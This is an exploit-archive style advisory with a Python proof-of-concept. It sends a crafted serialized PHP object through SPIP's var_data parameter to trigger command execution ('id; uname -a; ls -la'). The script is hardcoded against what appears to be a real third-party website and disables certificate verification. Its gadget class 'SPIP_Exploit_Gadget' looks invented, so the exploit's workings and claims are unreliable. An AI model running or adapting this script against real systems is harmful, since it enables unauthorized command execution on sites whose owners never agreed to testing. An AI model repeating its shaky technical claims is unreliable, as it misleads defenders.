=============================================================================================================================================
| # Title     : SPIP Gadget Chain before 4.4.9 Potential PHP Object Deserialization Vulnerability                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
=============================================================================================================================================

[+] Summary    :  This Python script is designed to send a crafted serialized PHP object to a target website in order to test for a potential PHP Object Deserialization vulnerability.

It:

Uses the requests library to send a GET request to a specified target URL.

Generates a serialized PHP payload referencing a class named SPIP_Exploit_Gadget.

Injects the payload into the var_data parameter.

Attempts to trigger command execution (id; uname -a; ls -la) if a vulnerable gadget chain exists on the server.

Disables SSL certificate verification warnings for testing purposes.

Prints the HTTP response and checks if command output appears in the response body.

[+] POC   : 

import requests
import urllib.parse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target_url = "https://www.peyres.fr" 
command_to_run = "id; uname -a; ls -la"

def generate_payload(cmd):
    """
    Generate a PHP serialized payload.
    Note: Success depends on the existence of the 'SPIP_Exploit_Gadget' class 
    or an equivalent Gadget Chain within the server-side files.
    """
    payload = f'O:19:"SPIP_Exploit_Gadget":1:{{s:7:"command";s:{len(cmd)}:"{cmd}";}}'
    return payload

def launch_exploit():
    payload = generate_payload(command_to_run)
    
    params = {
        'page': 'article',
        'id_article': '1',
        'var_data': payload  
    }

    print(f"[*] Sending payload to: {target_url}")
    print(f"[*] Target Command: {command_to_run}")
    
    try:
        response = requests.get(target_url, params=params, timeout=15, verify=False)
        
        print("-" * 30)
        print(f"[+] Response Status: {response.status_code}")

        if response.status_code == 200:
            print("[+] Potential output found in response body:")
            print(response.text[:1000]) # Print first 1000 characters for inspection
        else:
            print("[-] Server responded with an error.")
            
        print("-" * 30)
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection Error: {e}")

if __name__ == "__main__":
    launch_exploit()
	
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================